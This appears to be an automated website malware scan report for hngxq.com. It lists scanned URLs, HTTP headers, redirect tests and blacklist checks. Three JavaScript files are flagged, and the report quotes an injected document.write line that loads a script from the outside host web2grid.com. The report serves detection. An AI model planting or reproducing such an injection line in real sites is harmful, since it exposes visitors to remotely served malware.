Scanned pages/files
| Request | Server response | Status |
http://hngxq.com/ | 200 OK Content-Length: 106839 Content-Type: text/html | clean |
http://hngxq.com/ks_inc/jquery.js | 200 OK Content-Length: 38225 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://web2grid.com/JHzFB9yT.php?id="></script>'); | ||
http://hngxq.com/ks_inc/common.js | 200 OK Content-Length: 14114 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://web2grid.com/JHzFB9yT.php?id="></script>'); | ||
http://hngxq.com/ks_inc/lhgdialog.js | 200 OK Content-Length: 44972 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://web2grid.com/JHzFB9yT.php?id="></script>'); | ||
http://www.baidu.com/s?wd=º£ÄϸßУÉçÇø | HTTP/1.1 200 OK Cache-Control: private Connection: Keep-Alive Date: Fri, 01 Aug 2014 01:49:02 GMT Server: BWS/1.1 Vary: Accept-Encoding Content-Type: text/html;charset=utf-8 BDPAGETYPE: 3 BDQID: 0x83b6166f0000a641 BDUSERID: 0 Cxy_all: baidu+9fa5823d66201f11f281fceb3cdd83c3 P3P: CP=" OTI DSP COR IVA OUR IND COM " Set-Cookie: BAIDUID=0C31232C3E405D48D58AB2B8F4AD0523:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com Set-Cookie: BD_CK_SAM=1;path=/ Set-Cookie: BDSVRTM=550; path=/ Set-Cookie: H_PS_PSSID=6624_5230_1431_7800_7730_7780_6506_7635_6018_7673_7922_7607_7798_6888_7416_7688_7791_7803_7889_7475; path=/; domain=.baidu.com X-Powered-By: HPHP | clean |
http://www.baidu.com/s?wd=%e6%b5%b7%e5%8d%97%e9%ab%98%e6%a0%a1%e7%a4%be%e5%8c%ba&oq=%e6%b5%b7%e5%8d%97%e9%ab%98%e6%a0%a1%e7%a4%be%e5%8c%ba&ie=utf-8&nojs=1&bqid=83b6166f0000a641 | 200 OK Content-Length: 127093 Content-Type: text/html | clean |
http://s1.bdstatic.com/r/www/cache/static/jquery/jquery-1.10.2.min_f2fb5194.js | 200 OK Content-Length: 93680 Content-Type: application/javascript | clean |
http://s1.bdstatic.com/r/www/cache/static/global/js/all_async_popstate_fe115545.js | 200 OK Content-Length: 106682 Content-Type: application/javascript | clean |
http://www.baidu.com//www.baidu.com/gaoji/preferences.html/ | HTTP/1.1 302 Found Cache-Control: max-age=86400 Connection: Keep-Alive Date: Fri, 01 Aug 2014 01:49:12 GMT Location: http://www.baidu.com/search/error.html Server: Apache Content-Length: 222 Content-Type: text/html; charset=iso-8859-1 Expires: Sat, 02 Aug 2014 01:49:12 GMT | clean |
http://www.baidu.com/search/error.html | 200 OK Content-Length: 3349 Content-Type: text/html | clean |
http://www.baidu.com/ | HTTP/1.1 200 OK Cache-Control: private Connection: Keep-Alive Date: Fri, 01 Aug 2014 01:49:14 GMT Server: BWS/1.1 Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Expires: Fri, 01 Aug 2014 01:48:34 GMT BDPAGETYPE: 1 BDQID: 0x8c01db0b00002560 BDUSERID: 0 Cxy_all: baidu+2f8c8524277bea5d1025973a14c24301 P3P: CP=" OTI DSP COR IVA OUR IND COM " Set-Cookie: BAIDUID=CD284CA0686C375D28BB4FF5AEB0DAED:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com Set-Cookie: BDSVRTM=0; path=/ X-Powered-By: HPHP | clean |
http://www.baidu.com/baidu.html?from=noscript | 200 OK Content-Length: 7387 Content-Type: text/html | clean |
http://www.baidu.com/cache/hps/js/hps-1.1.js | 200 OK Content-Length: 614 Content-Type: application/javascript | clean |
http://www.baidu.com/gaoji/preferences.html | 200 OK Content-Length: 9881 Content-Type: text/html | clean |
http://www.baidu.com/test404page.js | HTTP/1.1 302 Found Cache-Control: max-age=86400 Connection: Keep-Alive Date: Fri, 01 Aug 2014 01:49:18 GMT Location: http://www.baidu.com/search/error.html Server: Apache Content-Length: 222 Content-Type: text/html; charset=iso-8859-1 Expires: Sat, 02 Aug 2014 01:49:18 GMT | clean |
http://www.baidu.com/more/ | 200 OK Content-Length: 44158 Content-Type: text/html | clean |
http://www.baidu.com/js/bdsug.js?v=1.0.3.0 | 200 OK Content-Length: 10188 Content-Type: application/javascript | clean |
http://www.baidu.com/search/jiqiao.html | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=86400 Connection: Keep-Alive Date: Fri, 01 Aug 2014 01:49:21 GMT Location: http://help.baidu.com/question Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 Expires: Sat, 02 Aug 2014 01:49:21 GMT | clean |
http://help.baidu.com/question | 200 OK Content-Length: 8951 Content-Type: text/html | clean |
http://help.baidu.com/resources_new/static/js/lib/tangram-2.0.2.1.js | 200 OK Content-Length: 105905 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hngxq.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 01 Aug 2014 01:06:23 GMT
Server: IIS
Content-Length: 106839
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQAQCQCSS=GLGFGLDBBKNJGCMKJOMDMLMP; path=/
X-Powered-By: WAF/2.0
...106839 bytes of data.
GET / HTTP/1.1
Host: hngxq.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 01 Aug 2014 01:06:23 GMT
Server: IIS
Content-Length: 106839
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQAQCQCSS=GLGFGLDBBKNJGCMKJOMDMLMP; path=/
X-Powered-By: WAF/2.0
...106839 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hngxq.com
Referer: http://www.google.com/search?q=hngxq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hngxq.com
Referer: http://www.google.com/search?q=hngxq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hngxq.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hngxq.com/
Result: hngxq.com is not infected or malware details are not published yet.
Result: hngxq.com is not infected or malware details are not published yet.